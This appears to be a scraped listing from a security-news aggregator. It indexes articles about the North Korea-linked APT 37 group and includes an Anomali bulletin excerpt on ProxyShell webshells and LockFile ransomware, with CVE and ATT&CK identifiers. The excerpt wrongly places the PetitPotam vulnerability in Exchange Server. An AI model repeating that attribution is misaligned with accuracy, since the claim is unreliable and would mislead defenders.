https://thehackernews.com/2021/11/new-chinotto-spyware-targets-north.html www.secnews.physaphae.fr/article.php?IdArticle=3722911 False Threat,Cloud APT 37,APT 37 None Security Affairs - Blog Secu 2021-11-19T15:14:40+00:00 https://securityaffairs.co/wordpress/124775/apt/north-korea-linked-ta406-2021.html?utm_source=rss&utm_medium=rss&utm_campaign=north-korea-linked-ta406-2021 www.secnews.physaphae.fr/article.php?IdArticle=3681411 False Cloud APT 37 None CISCO Talos - Cisco Research blog ]]> 2021-11-10T14:11:03+00:00 http://feedproxy.google.com/~r/feedburner/Talos/~3/z1BNb2_mgJ8/kimsuky-abuses-blogs-delivers-malware.html www.secnews.physaphae.fr/article.php?IdArticle=3641450 False Malware,Cloud APT 37 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag. Trending Cyber News and Threat Intelligence Microsoft Exchange Servers Still Vulnerable to ProxyShell Exploit (published: August 23, 2021) Despite patches a collection of vulnerabilities (ProxyShell) discovered in Microsoft Exchange being available in the July 2021 update, researchers discovered nearly 2,000 of these vulnerabilities have recently been compromised to host webshells. These webshells allow for attackers to retain backdoor access to compromised servers for further exploitation and lateral movement into the affected organizations. Researchers believe that these attacks may be related to the recent LockFile ransomware attacks. Analyst Comment: Organizations running Microsoft Exchange are strongly encouraged to prioritize updates to prevent ongoing exploitation of these vulnerabilities. In addition, a thorough investigation to discover and remove planted webshells should be undertaken as the patches will not remove planted webshells in their environments. A threat intelligence platform (TIP) such as Anomali Threatstream can be a valuable tool to assist organizations ingesting current indicators of compromise (IOCs) and determine whether their Exchange instances have been compromised. MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Web Shell - T1100 | [MITRE ATT&CK] Hidden Files and Directories - T1158 | [MITRE ATT&CK] Source - T1153 Tags: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, Exchange, ProxyShell, backdoor LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers (published: August 20, 2021) A new ransomware family, named Lockfile by Symantec researchers, has been observed on the network of a US financial organization. The first known instance of this ransomware was July 20, 2021, and activity is ongoing. This ransomware has been seen largely targeting organizations in a wide range of industries across the US and Asia. The initial access vector remains unknown at this time, but the ransomware leverages the incompletely patched PetitPotam vulnerability (CVE-2021-36942) in Microsoft's Exchange Server to pivot to Domain Controllers (DCs) which are then leveraged to deploy ransomware tools to devices that connect to the DC. The attackers appear to remain resident on the network for several]]> 2021-08-24T17:11:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-proxyshell-being-exploited-to-install-webshells-and-ransomware-neurevt-trojan-targeting-mexican-users-secret-terrorist-watchlist-exposed-and-more www.secnews.physaphae.fr/article.php?IdArticle=3276119 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching,Cloud APT 37 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2021-08-19T20:19:04+00:00 https://threatpost.com/inkysquid-exploiting-ie-bugs/168833/ www.secnews.physaphae.fr/article.php?IdArticle=3256492 False None APT 37 None Security Affairs - Blog Secu 2021-08-19T06:47:34+00:00 https://securityaffairs.co/wordpress/121262/apt/inkysquid-apt-ie-exploirs.html?utm_source=rss&utm_medium=rss&utm_campaign=inkysquid-apt-ie-exploirs www.secnews.physaphae.fr/article.php?IdArticle=3253548 False Cloud APT 37 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2021-08-18T01:33:33+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/f3Q4pG8_fI8/nk-hackers-deploy-browser-exploit-on.html www.secnews.physaphae.fr/article.php?IdArticle=3247579 False Malware,Threat,Cloud APT 37 None InfoSecurity Mag - InfoSecurity Magazine 2021-02-11T11:00:00+00:00 https://www.infosecurity-magazine.com:443/news/un-links-north-korea-281m-crypto/ www.secnews.physaphae.fr/article.php?IdArticle=2329491 False Cloud APT 37 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2021-01-08T01:54:44+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/yF4TY5O24po/alert-north-korean-hackers-targeting.html www.secnews.physaphae.fr/article.php?IdArticle=2156910 False Tool,Cloud APT 37 None Security Affairs - Blog Secu 2021-01-07T18:24:41+00:00 https://securityaffairs.co/wordpress/113134/malware/apt37-rokrat-trojan.html?utm_source=rss&utm_medium=rss&utm_campaign=apt37-rokrat-trojan www.secnews.physaphae.fr/article.php?IdArticle=2153437 False Threat APT 37 None Malwarebytes Labs - MalwarebytesLabs A North Korean threat group has swapped the usual Hangul Office lures for a cleverly packed Office macro. Categories: Social engineeringThreat analysis Tags: APT37HangulkoreaOfficerokratVBA (Read more...) ]]> 2021-01-06T15:14:45+00:00 https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/ www.secnews.physaphae.fr/article.php?IdArticle=2148073 False Threat,Cloud APT 37 None Bleeping Computer - Magazine Américain 2021-01-05T11:55:57+00:00 https://www.bleepingcomputer.com/news/security/north-korean-software-supply-chain-attack-targets-stock-investors/ www.secnews.physaphae.fr/article.php?IdArticle=2146238 False Cloud APT 37 None